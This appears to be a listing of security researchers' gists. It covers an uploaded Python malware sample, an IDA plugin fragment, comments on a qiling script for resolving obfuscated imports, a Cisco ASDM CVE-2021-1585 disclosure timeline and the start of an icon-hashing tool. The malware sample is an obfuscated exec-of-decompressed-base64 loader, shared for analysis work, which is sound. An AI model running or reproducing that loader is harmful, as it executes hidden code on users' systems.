JohnLaTwC

## uploaded by @JohnLaTwC
## sample hash: b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937

import zlib, base64
exec(zlib.decompress(base64.b64decode('eJzs3fuT5Xd95/ff9Vd0DbU1UiyL7j6X7iOXqsJabIWyYQksu9nYW67RTCN6PepRpmfAxOUqgQChlQyDkHUBLGZ0GdBldAex3PxvOLB2ycUGY2Crz5+QM7qgsCZU8kPmPM/3PFKpxOYihO3Ha8S3P+957t9x55mz5zbO7v1v5/cOzx3eeG7/jr0bD8/fdufZMyf3Dg9vPPzk4Y1nDq+bX7j4yPzC00/On/jB38yfeuGl+YXLl+YPf+fe+YXn7ppfePn5+Te/8NT80uUH/+7F+WNPfGZ+8bUvzC+8+JX5c9/5xvzil7/8kwsPzy+9dt/Ra3fPH//ep+fPv/CZ+YVn7p5f+Oar8wuffvkn3/ra/MKlL/34hcUf7NH5Y9+9d/70F5/5P7/17NErX51fePChf3r2nvljT352/vhX/2r+yN3f/y8X50994+vzC99/8OjKd35+9wvziw/eO3/2ycvzbz68+PsfeWrxj33i75+YP3fPQ/NHvvbln7/y1b99cf7wQ5+fP3bptfmVR742v3jp7qPvvji//K3X/ttnfjB/5K5L8yce/Zv/8o0fPT2/cOW++WPfuf/ohR/Mn/z0Dxf/Dr/+o2/Pn/zB1+ZPPffD+dPPvfr6M/f84oc/mF948pXFn/0Di3+de+dX/vLBX9z19Pzi5a/84q5v/OyRR39+92fmD3/v8uLvu7T4Q31r/sRn7/vpF58/euWef3rupb/77vyxp+7+0Vfml569e/7Y49/7r5975Oj5h+YX/vqv/u7Rn33nO0evXpk/ffnC/MIrX58/98A98yf+6sr8m99+7Kffvfz3n/pv9z4yf/Lxexf/rJfmT375Uz978cn5Ny4/sPif8

uf0o

"""
Author: Matteo 'uf0' Malvica @matteomalvica
Tested with IDA 7.5 and Py3
Original plugin: https://github.com/FSecureLABS/win_driver_plugin
"""

def getopvalue(addr):
    """Returns the value of the second operand to the instruction at `addr` masked to be a 32 bit value"""
    return idc.get_operand_value(addr, 1) & 0xffffffff

y0ug

# Emulate sample to resolv obfuscated import with qiling 
# Just one way to do it, this method is kind of slow. 
# You need to have all the required DLL in the 'rootfs'
# Classic getprocaddress by hash we hook after the call
# read EAX and resolv the name from ql.loader.import_symbols
# compute the address of the mov operand
# generate the idapython code

# python3 IAT_qiling.py sample.exe | tee addr_ida.py
# idapython is in addr_ida.py at the end

mlashley

Cisco ASDM IDM Launcher Vulnerabilities CVE-2021-1585

Timeline

• 2020-12-14 - Disclosed to Cisco PSIRT
• 2021-02-09 - Incident manager assigned
• 2021-03-05 - Cisco confirmed RCE/Drive-by-download findings, confirmed not validating certs on remote is 'expected behaviour'
• 2021-07-07 - Cisco published without having gotten to delivering a fix.
• 2022-08-11 - Rapid7 / Jake Baines publish followon research - apparently the original fix for this was incomplete, and they took it a bunch further. They do credit, but fail to invite me to present at Black Hat USA/DEF CON with them ;-) https://forum.defcon.org/node/241939 and https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/

fr0gger

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Thomas Roccia | IconDhash.py
# pip3 install lief
# pip3 install pillow
# resource: https://www.hackerfactor.com/blog/?/archives/529-Kind-of-Like-That.html

import lief
import os
import argparse